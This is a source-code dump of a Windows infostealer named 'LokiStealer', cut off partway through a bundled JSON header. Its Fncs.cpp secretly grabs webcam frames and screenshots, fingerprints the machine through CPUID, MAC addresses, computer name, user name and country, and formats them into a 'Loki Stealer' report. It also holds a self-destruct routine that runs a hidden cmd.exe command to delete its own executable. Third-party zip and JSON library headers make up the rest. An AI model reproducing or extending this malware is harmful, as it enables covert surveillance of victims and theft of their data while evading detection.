0; 108 | } 109 | 110 | source += 3; 111 | 112 | p[0] = cb64[cur[0] >> 2]; 113 | p[1] = cb64[((cur[0] & 0x03) << 4) | ((cur[1] & 0xF0) >> 4)]; 114 | p[2] = (BYTE)(len > 1 ? cb64[((cur[1] & 0x0F) << 2) | ((cur[2] & 0xC0) >> 6)] : '.');//. = = 115 | p[3] = (BYTE)(len > 2 ? cb64[cur[2] & 0x3F] : '.');//. = = 116 | 117 | p += 4; 118 | } 119 | 120 | *p = 0; 121 | if (destSize)*destSize = (SIZE_T)(p - dest); 122 | } 123 | 124 | return (LPSTR)dest; 125 | } 126 | 127 | void __cpuid(uint32_t CPUInfo[4], int InfoType) 128 | { 129 | __asm 130 | { 131 | mov esi, CPUInfo 132 | mov eax, InfoType 133 | xor ecx, ecx 134 | cpuid 135 | mov dword ptr[esi + 0], eax 136 | mov dword ptr[esi + 4], ebx 137 | mov dword ptr[esi + 8], ecx 138 | mov dword ptr[esi + 12], edx 139 | } 140 | } 141 | 142 | LPCSTR genHwid() { 143 | uint32_t CPUInfo[4]; 144 | unsigned char mac[8] = { 0x1, 0x2, 0x1, 0x2, 0x1, 0x2, 0x1, 0x2 }; 145 | 146 | __cpuid(CPUInfo, 0); 147 | IP_ADAPTER_INFO AdapterInfo[16]; 148 | DWORD dwBufLen = sizeof(AdapterInfo); 149 | DWORD dwStatus = GetAdaptersInfo(AdapterInfo, &dwBufLen); 150 | PIP_ADAPTER_INFO pAdapterInfo = AdapterInfo; 151 | do 152 | { 153 | for (int i = 0; i < 8; i++) mac[i] = mac[i] + pAdapterInfo->Address[i]; 154 | pAdapterInfo = pAdapterInfo->Next; 155 | } while (pAdapterInfo); 156 | 157 | char* hwid = (char*)_alloc(100); 158 | wnsprintfA(hwid, 100, "%x%x%x%x%x%x%x%x%x%x%x%x", 159 | CPUInfo[0], CPUInfo[1], CPUInfo[2], 160 | CPUInfo[3], mac[0], mac[1], 161 | mac[2], mac[3], mac[4], 162 | mac[5], mac[6], mac[7]); 163 | 164 | return hwid; 165 | } -------------------------------------------------------------------------------- /Source/LokiStealer/LokiStealer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {56647c63-4e31-4ab6-8c1a-6819a7a7c698} 25 | LokiStealer 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Windows 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | 122 | 123 | Console 124 | true 125 | true 126 | true 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /Source/LokiStealer/Fncs.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "fncs.h" 7 | #include "mem.h" 8 | 9 | #pragma comment(lib, "Vfw32.lib") 10 | 11 | #define capSendMessage(hWnd, uMsg, wParm, lParam) ((IsWindow(hWnd)) ? SendMessageW(hWnd, uMsg, (WPARAM)(wParm), (LPARAM)(lParam)) : 0) 12 | 13 | BOOL capWebCam(WCHAR* szFile, int nIndex, int nX, int nY, int nMsg) 14 | { 15 | HWND hWndCap = capCreateCaptureWindowW(L"CapWebCam", WS_CHILD, 0, 0, nX, nY, GetDesktopWindow(), 0); 16 | if (!hWndCap) return FALSE; 17 | 18 | if (!capSendMessage(hWndCap, WM_CAP_DRIVER_CONNECT, nIndex, 0)) { 19 | DestroyWindow(hWndCap); return FALSE; 20 | } 21 | 22 | CAPDRIVERCAPS capDriverCaps; 23 | memset(&capDriverCaps, 0, sizeof(CAPDRIVERCAPS)); 24 | capSendMessage(hWndCap, WM_CAP_DRIVER_GET_CAPS, sizeof(CAPDRIVERCAPS), &capDriverCaps); 25 | if (!capDriverCaps.fCaptureInitialized) { 26 | DestroyWindow(hWndCap); return FALSE; 27 | } 28 | 29 | capSendMessage(hWndCap, WM_CAP_SET_SCALE, TRUE, 0); 30 | capSendMessage(hWndCap, WM_CAP_GRAB_FRAME_NOSTOP, 0, 0); 31 | capSendMessage(hWndCap, WM_CAP_FILE_SAVEDIBW, 0, szFile); 32 | capSendMessage(hWndCap, WM_CAP_DRIVER_DISCONNECT, 0, 0); 33 | DestroyWindow(hWndCap); 34 | 35 | return TRUE; 36 | } 37 | 38 | int GetCamIndex() 39 | { 40 | char szDeviceName[80]; 41 | char szDeviceVersion[80]; 42 | 43 | for (int wIndex = 0; wIndex < 9; wIndex++) 44 | { 45 | if (capGetDriverDescriptionA(wIndex, szDeviceName, sizeof(szDeviceName), 46 | szDeviceVersion, sizeof(szDeviceVersion))) 47 | return wIndex; 48 | } 49 | return -1; 50 | } 51 | 52 | void captureCam(WCHAR* szPath) { 53 | int nIndex = GetCamIndex(); 54 | if (nIndex == -1) 55 | return; 56 | 57 | capWebCam(szPath, nIndex, 640, 480, 10); 58 | } 59 | 60 | LPCSTR genCountry() { 61 | GEOID myGEO = GetUserGeoID(GEOCLASS_NATION); 62 | int sizeOfBuffer = GetGeoInfoA(myGEO, GEO_ISO2, NULL, 0, 0); 63 | 64 | CHAR* geo = (CHAR*)_alloc(sizeOfBuffer + 1); 65 | 66 | _set(geo, 0, sizeOfBuffer + 1); 67 | GetGeoInfoA(myGEO, GEO_ISO2, geo, sizeOfBuffer, 0); 68 | 69 | return geo; 70 | } 71 | 72 | void randomInt(SIZE_T* out, int from, int to) { 73 | HCRYPTPROV prov; 74 | BYTE pbData[2]; 75 | 76 | if (CryptAcquireContextA(&prov, NULL, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 77 | { 78 | if (CryptGenRandom(prov, 2, pbData)) 79 | { 80 | *out = (from + (((int)pbData[0] ^ (int)pbData[1]) % (to - from))); 81 | 82 | if (CryptReleaseContext(prov, 0)) 83 | return; 84 | } 85 | else { 86 | _free(pbData); 87 | if (CryptReleaseContext(prov, 0)) 88 | return; 89 | } 90 | } 91 | else { 92 | _free(pbData); 93 | } 94 | } 95 | 96 | void CryptGenKey(BYTE** data) { 97 | HCRYPTPROV prov; 98 | BYTE* pbData = (BYTE*)_alloc(256); 99 | 100 | if (CryptAcquireContextA(&prov, NULL, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) 101 | { 102 | if (CryptGenRandom(prov, 256, pbData)) 103 | { 104 | *data = pbData; 105 | 106 | if (CryptReleaseContext(prov, 0)) 107 | return; 108 | } 109 | else { 110 | _free(pbData); 111 | if (CryptReleaseContext(prov, 0)) 112 | return; 113 | } 114 | } 115 | else { 116 | _free(pbData); 117 | } 118 | } 119 | 120 | void selfDestruct() 121 | { 122 | WCHAR* szModuleName = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 123 | WCHAR* szCmd = (WCHAR*)_alloc((MAX_PATH * 2) * sizeof(WCHAR)); 124 | STARTUPINFO si = { 0 }; 125 | PROCESS_INFORMATION pi = { 0 }; 126 | 127 | GetModuleFileNameW(NULL, szModuleName, MAX_PATH); 128 | wnsprintfW(szCmd, MAX_PATH, L"cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"%s\"", szModuleName); 129 | CreateProcessW(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); 130 | _free(szModuleName); 131 | _free(szCmd); 132 | 133 | CloseHandle(pi.hThread); 134 | CloseHandle(pi.hProcess); 135 | ExitProcess(0); 136 | } 137 | 138 | LPCWSTR getSystemInfoW() { 139 | HW_PROFILE_INFOW hw; 140 | GEOID myGEO = GetUserGeoID(GEOCLASS_NATION); 141 | int sizeOfBuffer = GetGeoInfoW(myGEO, GEO_ISO2, NULL, 0, 0); 142 | DWORD size = MAX_PATH; 143 | 144 | WCHAR* computername = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 145 | WCHAR* hwid = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 146 | WCHAR* username = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 147 | WCHAR* geo = (WCHAR*)_alloc((sizeOfBuffer + 1) * sizeof(WCHAR)); 148 | 149 | memset(geo, 0, (sizeOfBuffer + 1) * sizeof(WCHAR)); 150 | GetComputerNameW(computername, &size); 151 | GetCurrentHwProfileW(&hw); 152 | lstrcpyW(hwid, hw.szHwProfileGuid); 153 | GetEnvironmentVariableW(L"USERNAME", username, MAX_PATH); 154 | GetGeoInfoW(myGEO, GEO_ISO2, geo, sizeOfBuffer, 0); 155 | 156 | if (computername && hwid && username && geo) { 157 | WCHAR* info = (WCHAR*)_alloc(512 * sizeof(WCHAR)); 158 | 159 | wnsprintfW(info, 512, 160 | L"Loki Stealer\r\n" 161 | L"\r\n" 162 | L"Computer Name: %s\r\n" 163 | L"\r\n" 164 | L"Hardware id: %s\r\n" 165 | L"\r\n" 166 | L"User name: %s\r\n" 167 | L"\r\n" 168 | L"Computer country: %s\r\n" 169 | L"\r\n", 170 | computername, hwid, username, geo 171 | ); 172 | 173 | _free(computername); 174 | _free(hwid); 175 | _free(username); 176 | _free(geo); 177 | 178 | return info; 179 | } 180 | 181 | _free(computername); 182 | _free(hwid); 183 | _free(username); 184 | _free(geo); 185 | 186 | return 0; 187 | } 188 | 189 | CHAR* randKey() { 190 | const CHAR ALPH[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H' }; 191 | int min = 0; 192 | int max = _countof(ALPH); 193 | int rand; 194 | CHAR* mem = (CHAR*)_alloc(5); 195 | 196 | rand = min + ((0xCC * GetTickCount()) % max); 197 | mem[0] = ALPH[rand]; 198 | rand = min + ((0xAD * GetTickCount()) % max); 199 | mem[1] = ALPH[rand]; 200 | rand = min + ((0xDD * GetTickCount()) % max); 201 | mem[2] = ALPH[rand]; 202 | rand = min + ((0xEA * GetTickCount()) % max); 203 | mem[3] = ALPH[rand]; 204 | mem[4] = 0; 205 | 206 | return mem; 207 | } 208 | 209 | BOOL pathExists(LPCWSTR path, BOOL isFile) { 210 | if (isFile) { 211 | DWORD dwAttrib = GetFileAttributesW(path); 212 | 213 | return (dwAttrib != INVALID_FILE_ATTRIBUTES && 214 | !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); 215 | } 216 | else { 217 | DWORD attribs = ::GetFileAttributesW(path); 218 | if (attribs == INVALID_FILE_ATTRIBUTES) { 219 | return false; 220 | } 221 | return (attribs & FILE_ATTRIBUTE_DIRECTORY); 222 | } 223 | } 224 | 225 | LPCWSTR resolveEnvrimoment(const WCHAR* env) { 226 | WCHAR* mem = (WCHAR*)_alloc(MAX_PATH * sizeof(WCHAR)); 227 | GetEnvironmentVariableW(env, mem, 260); 228 | return mem; 229 | } 230 | 231 | int captureScreenshot(LPCWSTR szFile) 232 | { 233 | HDC hdcScr, hdcMem; 234 | HBITMAP hbmScr; 235 | BITMAP bmp; 236 | int iXRes, iYRes; 237 | 238 | hdcScr = CreateDCA("DISPLAY", NULL, NULL, NULL); 239 | hdcMem = CreateCompatibleDC(hdcScr); 240 | iXRes = GetDeviceCaps(hdcScr, HORZRES); 241 | iYRes = GetDeviceCaps(hdcScr, VERTRES); 242 | hbmScr = CreateCompatibleBitmap(hdcScr, iXRes, iYRes); 243 | if (hbmScr == 0) return 0; 244 | if (!SelectObject(hdcMem, hbmScr)) return 0; 245 | if (!StretchBlt(hdcMem, 246 | 0, 0, iXRes, iYRes, 247 | hdcScr, 248 | 0, 0, iXRes, iYRes, 249 | SRCCOPY)) 250 | 251 | return 0; 252 | 253 | PBITMAPINFO pbmi; 254 | WORD cClrBits; 255 | 256 | if (!GetObjectW(hbmScr, sizeof(BITMAP), (LPSTR)&bmp)) return 0; 257 | 258 | cClrBits = (WORD)(bmp.bmPlanes * bmp.bmBitsPixel); 259 | if (cClrBits == 1) 260 | cClrBits = 1; 261 | else if (cClrBits <= 4) 262 | cClrBits = 4; 263 | else if (cClrBits <= 8) 264 | cClrBits = 8; 265 | else if (cClrBits <= 16) 266 | cClrBits = 16; 267 | else if (cClrBits <= 24) 268 | cClrBits = 24; 269 | else cClrBits = 32; 270 | if (cClrBits != 24) 271 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, 272 | sizeof(BITMAPINFOHEADER) + 273 | sizeof(RGBQUAD) * (1 << cClrBits)); 274 | 275 | else 276 | pbmi = (PBITMAPINFO)LocalAlloc(LPTR, 277 | sizeof(BITMAPINFOHEADER)); 278 | 279 | pbmi->bmiHeader.biSize = sizeof(BITMAPINFOHEADER); 280 | pbmi->bmiHeader.biWidth = bmp.bmWidth; 281 | pbmi->bmiHeader.biHeight = bmp.bmHeight; 282 | pbmi->bmiHeader.biPlanes = bmp.bmPlanes; 283 | pbmi->bmiHeader.biBitCount = bmp.bmBitsPixel; 284 | if (cClrBits < 24) 285 | pbmi->bmiHeader.biClrUsed = (1 << cClrBits); 286 | 287 | pbmi->bmiHeader.biCompression = BI_RGB; 288 | pbmi->bmiHeader.biSizeImage = (pbmi->bmiHeader.biWidth + 7) / 8 289 | * pbmi->bmiHeader.biHeight * cClrBits; 290 | pbmi->bmiHeader.biClrImportant = 0; 291 | 292 | HANDLE hf; 293 | BITMAPFILEHEADER hdr; 294 | PBITMAPINFOHEADER pbih; 295 | LPBYTE lpBits; 296 | DWORD dwTotal; 297 | DWORD cb; 298 | BYTE *hp; 299 | DWORD dwTmp; 300 | 301 | pbih = (PBITMAPINFOHEADER)pbmi; 302 | lpBits = (LPBYTE)GlobalAlloc(GMEM_FIXED, pbih->biSizeImage); 303 | 304 | if (!lpBits) return 0; 305 | if (!GetDIBits(hdcMem, hbmScr, 0, (WORD)pbih->biHeight, lpBits, pbmi, DIB_RGB_COLORS)) return 0; 306 | hf = CreateFileW(szFile, 307 | GENERIC_READ | GENERIC_WRITE, 308 | (DWORD)0, 309 | NULL, 310 | CREATE_ALWAYS, 311 | FILE_ATTRIBUTE_NORMAL, 312 | (HANDLE)NULL); 313 | if (hf == INVALID_HANDLE_VALUE) return 0; 314 | 315 | hdr.bfType = 0x4d42; 316 | 317 | hdr.bfSize = (DWORD)(sizeof(BITMAPFILEHEADER) + 318 | pbih->biSize + pbih->biClrUsed * 319 | sizeof(RGBQUAD) + pbih->biSizeImage); 320 | hdr.bfReserved1 = 0; 321 | hdr.bfReserved2 = 0; 322 | hdr.bfOffBits = (DWORD) sizeof(BITMAPFILEHEADER) + 323 | pbih->biSize + pbih->biClrUsed * 324 | sizeof(RGBQUAD); 325 | 326 | if (!WriteFile(hf, (LPVOID)&hdr, sizeof(BITMAPFILEHEADER), (LPDWORD)&dwTmp, NULL)) return 0; 327 | 328 | if (!WriteFile(hf, (LPVOID)pbih, sizeof(BITMAPINFOHEADER) 329 | + pbih->biClrUsed * sizeof(RGBQUAD), 330 | (LPDWORD)&dwTmp, NULL)) 331 | return 0; 332 | 333 | dwTotal = cb = pbih->biSizeImage; 334 | hp = lpBits; 335 | if (!WriteFile(hf, (LPSTR)hp, (int)cb, (LPDWORD)&dwTmp, NULL)) return 0; 336 | 337 | if (!CloseHandle(hf)) return 0; 338 | 339 | GlobalFree((HGLOBAL)lpBits); 340 | ReleaseDC(0, hdcScr); 341 | ReleaseDC(0, hdcMem); 342 | 343 | return 1; 344 | } -------------------------------------------------------------------------------- /Source/LokiStealer/zip.h: -------------------------------------------------------------------------------- 1 | #ifndef _zip_H 2 | #define _zip_H 3 | 4 | 5 | // ZIP functions -- for creating zip files 6 | // This file is a repackaged form of the Info-Zip source code available 7 | // at www.info-zip.org. The original copyright notice may be found in 8 | // zip.cpp. The repackaging was done by Lucian Wischik to simplify and 9 | // extend its use in Windows/C++. Also to add encryption and unicode. 10 | 11 | 12 | #ifndef _unzip_H 13 | DECLARE_HANDLE(HZIP); 14 | #endif 15 | // An HZIP identifies a zip file that is being created 16 | 17 | typedef DWORD ZRESULT; 18 | // return codes from any of the zip functions. Listed later. 19 | 20 | 21 | 22 | HZIP CreateZip(const TCHAR *fn, const char *password); 23 | HZIP CreateZip(void *buf,unsigned int len, const char *password); 24 | HZIP CreateZipHandle(HANDLE h, const char *password); 25 | // CreateZip - call this to start the creation of a zip file. 26 | // As the zip is being created, it will be stored somewhere: 27 | // to a pipe: CreateZipHandle(hpipe_write); 28 | // in a file (by handle): CreateZipHandle(hfile); 29 | // in a file (by name): CreateZip("c:\\test.zip"); 30 | // in memory: CreateZip(buf, len); 31 | // or in pagefile memory: CreateZip(0, len); 32 | // The final case stores it in memory backed by the system paging file, 33 | // where the zip may not exceed len bytes. This is a bit friendlier than 34 | // allocating memory with new[]: it won't lead to fragmentation, and the 35 | // memory won't be touched unless needed. That means you can give very 36 | // large estimates of the maximum-size without too much worry. 37 | // As for the password, it lets you encrypt every file in the archive. 38 | // (This api doesn't support per-file encryption.) 39 | // Note: because pipes don't allow random access, the structure of a zipfile 40 | // created into a pipe is slightly different from that created into a file 41 | // or memory. In particular, the compressed-size of the item cannot be 42 | // stored in the zipfile until after the item itself. (Also, for an item added 43 | // itself via a pipe, the uncompressed-size might not either be known until 44 | // after.) This is not normally a problem. But if you try to unzip via a pipe 45 | // as well, then the unzipper will not know these things about the item until 46 | // after it has been unzipped. Therefore: for unzippers which don't just write 47 | // each item to disk or to a pipe, but instead pre-allocate memory space into 48 | // which to unzip them, then either you have to create the zip not to a pipe, 49 | // or you have to add items not from a pipe, or at least when adding items 50 | // from a pipe you have to specify the length. 51 | // Note: for windows-ce, you cannot close the handle until after CloseZip. 52 | // but for real windows, the zip makes its own copy of your handle, so you 53 | // can close yours anytime. 54 | 55 | 56 | ZRESULT ZipAdd(HZIP hz,const TCHAR *dstzn, const TCHAR *fn); 57 | ZRESULT ZipAdd(HZIP hz,const TCHAR *dstzn, void *src,unsigned int len); 58 | ZRESULT ZipAddHandle(HZIP hz,const TCHAR *dstzn, HANDLE h); 59 | ZRESULT ZipAddHandle(HZIP hz,const TCHAR *dstzn, HANDLE h, unsigned int len); 60 | ZRESULT ZipAddFolder(HZIP hz,const TCHAR *dstzn); 61 | // ZipAdd - call this for each file to be added to the zip. 62 | // dstzn is the name that the file will be stored as in the zip file. 63 | // The file to be added to the zip can come 64 | // from a pipe: ZipAddHandle(hz,"file.dat", hpipe_read); 65 | // from a file: ZipAddHandle(hz,"file.dat", hfile); 66 | // from a filen: ZipAdd(hz,"file.dat", "c:\\docs\\origfile.dat"); 67 | // from memory: ZipAdd(hz,"subdir\\file.dat", buf,len); 68 | // (folder): ZipAddFolder(hz,"subdir"); 69 | // Note: if adding an item from a pipe, and if also creating the zip file itself 70 | // to a pipe, then you might wish to pass a non-zero length to the ZipAddHandle 71 | // function. This will let the zipfile store the item's size ahead of the 72 | // compressed item itself, which in turn makes it easier when unzipping the 73 | // zipfile from a pipe. 74 | 75 | ZRESULT ZipGetMemory(HZIP hz, void **buf, unsigned long *len); 76 | // ZipGetMemory - If the zip was created in memory, via ZipCreate(0,len), 77 | // then this function will return information about that memory block. 78 | // buf will receive a pointer to its start, and len its length. 79 | // Note: you can't add any more after calling this. 80 | 81 | ZRESULT CloseZip(HZIP hz); 82 | // CloseZip - the zip handle must be closed with this function. 83 | 84 | unsigned int FormatZipMessage(ZRESULT code, TCHAR *buf,unsigned int len); 85 | // FormatZipMessage - given an error code, formats it as a string. 86 | // It returns the length of the error message. If buf/len points 87 | // to a real buffer, then it also writes as much as possible into there. 88 | 89 | 90 | 91 | // These are the result codes: 92 | #define ZR_OK 0x00000000 // nb. the pseudo-code zr-recent is never returned, 93 | #define ZR_RECENT 0x00000001 // but can be passed to FormatZipMessage. 94 | // The following come from general system stuff (e.g. files not openable) 95 | #define ZR_GENMASK 0x0000FF00 96 | #define ZR_NODUPH 0x00000100 // couldn't duplicate the handle 97 | #define ZR_NOFILE 0x00000200 // couldn't create/open the file 98 | #define ZR_NOALLOC 0x00000300 // failed to allocate some resource 99 | #define ZR_WRITE 0x00000400 // a general error writing to the file 100 | #define ZR_NOTFOUND 0x00000500 // couldn't find that file in the zip 101 | #define ZR_MORE 0x00000600 // there's still more data to be unzipped 102 | #define ZR_CORRUPT 0x00000700 // the zipfile is corrupt or not a zipfile 103 | #define ZR_READ 0x00000800 // a general error reading the file 104 | // The following come from mistakes on the part of the caller 105 | #define ZR_CALLERMASK 0x00FF0000 106 | #define ZR_ARGS 0x00010000 // general mistake with the arguments 107 | #define ZR_NOTMMAP 0x00020000 // tried to ZipGetMemory, but that only works on mmap zipfiles, which yours wasn't 108 | #define ZR_MEMSIZE 0x00030000 // the memory size is too small 109 | #define ZR_FAILED 0x00040000 // the thing was already failed when you called this function 110 | #define ZR_ENDED 0x00050000 // the zip creation has already been closed 111 | #define ZR_MISSIZE 0x00060000 // the indicated input file size turned out mistaken 112 | #define ZR_PARTIALUNZ 0x00070000 // the file had already been partially unzipped 113 | #define ZR_ZMODE 0x00080000 // tried to mix creating/opening a zip 114 | // The following come from bugs within the zip library itself 115 | #define ZR_BUGMASK 0xFF000000 116 | #define ZR_NOTINITED 0x01000000 // initialisation didn't work 117 | #define ZR_SEEK 0x02000000 // trying to seek in an unseekable file 118 | #define ZR_NOCHANGE 0x04000000 // changed its mind on storage, but not allowed 119 | #define ZR_FLATE 0x05000000 // an internal error in the de/inflation code 120 | 121 | 122 | 123 | 124 | 125 | 126 | // e.g. 127 | // 128 | // (1) Traditional use, creating a zipfile from existing files 129 | // HZIP hz = CreateZip("c:\\simple1.zip",0); 130 | // ZipAdd(hz,"znsimple.bmp", "c:\\simple.bmp"); 131 | // ZipAdd(hz,"znsimple.txt", "c:\\simple.txt"); 132 | // CloseZip(hz); 133 | // 134 | // (2) Memory use, creating an auto-allocated mem-based zip file from various sources 135 | // HZIP hz = CreateZip(0,100000, 0); 136 | // // adding a conventional file... 137 | // ZipAdd(hz,"src1.txt", "c:\\src1.txt"); 138 | // // adding something from memory... 139 | // char buf[1000]; for (int i=0; i<1000; i++) buf[i]=(char)(i&0x7F); 140 | // ZipAdd(hz,"file.dat", buf,1000); 141 | // // adding something from a pipe... 142 | // HANDLE hread,hwrite; CreatePipe(&hread,&hwrite,NULL,0); 143 | // HANDLE hthread = CreateThread(0,0,ThreadFunc,(void*)hwrite,0,0); 144 | // ZipAdd(hz,"unz3.dat", hread,1000); // the '1000' is optional. 145 | // WaitForSingleObject(hthread,INFINITE); 146 | // CloseHandle(hthread); CloseHandle(hread); 147 | // ... meanwhile DWORD WINAPI ThreadFunc(void *dat) 148 | // { HANDLE hwrite = (HANDLE)dat; 149 | // char buf[1000]={17}; 150 | // DWORD writ; WriteFile(hwrite,buf,1000,&writ,NULL); 151 | // CloseHandle(hwrite); 152 | // return 0; 153 | // } 154 | // // and now that the zip is created, let's do something with it: 155 | // void *zbuf; unsigned long zlen; ZipGetMemory(hz,&zbuf,&zlen); 156 | // HANDLE hfz = CreateFile("test2.zip",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); 157 | // DWORD writ; WriteFile(hfz,zbuf,zlen,&writ,NULL); 158 | // CloseHandle(hfz); 159 | // CloseZip(hz); 160 | // 161 | // (3) Handle use, for file handles and pipes 162 | // HANDLE hzread,hzwrite; CreatePipe(&hzread,&hzwrite,0,0); 163 | // HANDLE hthread = CreateThread(0,0,ZipReceiverThread,(void*)hzread,0,0); 164 | // HZIP hz = CreateZipHandle(hzwrite,0); 165 | // // ... add to it 166 | // CloseZip(hz); 167 | // CloseHandle(hzwrite); 168 | // WaitForSingleObject(hthread,INFINITE); 169 | // CloseHandle(hthread); 170 | // ... meanwhile DWORD WINAPI ZipReceiverThread(void *dat) 171 | // { HANDLE hread = (HANDLE)dat; 172 | // char buf[1000]; 173 | // while (true) 174 | // { DWORD red; ReadFile(hread,buf,1000,&red,NULL); 175 | // // ... and do something with this zip data we're receiving 176 | // if (red==0) break; 177 | // } 178 | // CloseHandle(hread); 179 | // return 0; 180 | // } 181 | 182 | 183 | 184 | // Now we indulge in a little skullduggery so that the code works whether 185 | // the user has included just zip or both zip and unzip. 186 | // Idea: if header files for both zip and unzip are present, then presumably 187 | // the cpp files for zip and unzip are both present, so we will call 188 | // one or the other of them based on a dynamic choice. If the header file 189 | // for only one is present, then we will bind to that particular one. 190 | ZRESULT CloseZipZ(HZIP hz); 191 | unsigned int FormatZipMessageZ(ZRESULT code, char *buf,unsigned int len); 192 | bool IsZipHandleZ(HZIP hz); 193 | #ifdef _unzip_H 194 | #undef CloseZip 195 | #define CloseZip(hz) (IsZipHandleZ(hz)?CloseZipZ(hz):CloseZipU(hz)) 196 | #else 197 | #define CloseZip CloseZipZ 198 | #define FormatZipMessage FormatZipMessageZ 199 | #endif 200 | 201 | 202 | 203 | #endif 204 | -------------------------------------------------------------------------------- /Source/LokiStealer/parson.h: -------------------------------------------------------------------------------- 1 | /* 2 | Parson ( http://kgabis.github.com/parson/ ) 3 | Copyright (c) 2012 - 2017 Krzysztof Gabis 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in 13 | all copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 21 | THE SOFTWARE. 22 | */ 23 | 24 | #ifndef parson_parson_h 25 | #define parson_parson_h 26 | 27 | #ifdef __cplusplus 28 | extern "C" 29 | { 30 | #endif 31 | 32 | #include /* size_t */ 33 | 34 | /* Types and enums */ 35 | typedef struct json_object_t JSON_Object; 36 | typedef struct json_array_t JSON_Array; 37 | typedef struct json_value_t JSON_Value; 38 | 39 | enum json_value_type { 40 | JSONError = -1, 41 | JSONNull = 1, 42 | JSONString = 2, 43 | JSONNumber = 3, 44 | JSONObject = 4, 45 | JSONArray = 5, 46 | JSONBoolean = 6 47 | }; 48 | typedef int JSON_Value_Type; 49 | 50 | enum json_result_t { 51 | JSONSuccess = 0, 52 | JSONFailure = -1 53 | }; 54 | typedef int JSON_Status; 55 | 56 | typedef void * (*JSON_Malloc_Function)(size_t); 57 | typedef void (*JSON_Free_Function)(void *); 58 | 59 | /* Call only once, before calling any other function from parson API. If not called, malloc and free 60 | from stdlib will be used for all allocations */ 61 | void json_set_allocation_functions(JSON_Malloc_Function malloc_fun, JSON_Free_Function free_fun); 62 | 63 | /* Sets if slashes should be escaped or not when serializing JSON. By default slashes are escaped. 64 | This function sets a global setting and is not thread safe. */ 65 | void json_set_escape_slashes(int escape_slashes); 66 | 67 | /* Parses first JSON value in a file, returns NULL in case of error */ 68 | JSON_Value * json_parse_file(const char *filename); 69 | 70 | /* Parses first JSON value in a file and ignores comments (/ * * / and //), 71 | returns NULL in case of error */ 72 | JSON_Value * json_parse_file_with_comments(const char *filename); 73 | 74 | /* Parses first JSON value in a string, returns NULL in case of error */ 75 | JSON_Value * json_parse_string(const char *string); 76 | 77 | /* Parses first JSON value in a string and ignores comments (/ * * / and //), 78 | returns NULL in case of error */ 79 | JSON_Value * json_parse_string_with_comments(const char *string); 80 | 81 | /* Serialization */ 82 | size_t json_serialization_size(const JSON_Value *value); /* returns 0 on fail */ 83 | JSON_Status json_serialize_to_buffer(const JSON_Value *value, char *buf, size_t buf_size_in_bytes); 84 | JSON_Status json_serialize_to_file(const JSON_Value *value, const char *filename); 85 | char * json_serialize_to_string(const JSON_Value *value); 86 | 87 | /* Pretty serialization */ 88 | size_t json_serialization_size_pretty(const JSON_Value *value); /* returns 0 on fail */ 89 | JSON_Status json_serialize_to_buffer_pretty(const JSON_Value *value, char *buf, size_t buf_size_in_bytes); 90 | JSON_Status json_serialize_to_file_pretty(const JSON_Value *value, const char *filename); 91 | char * 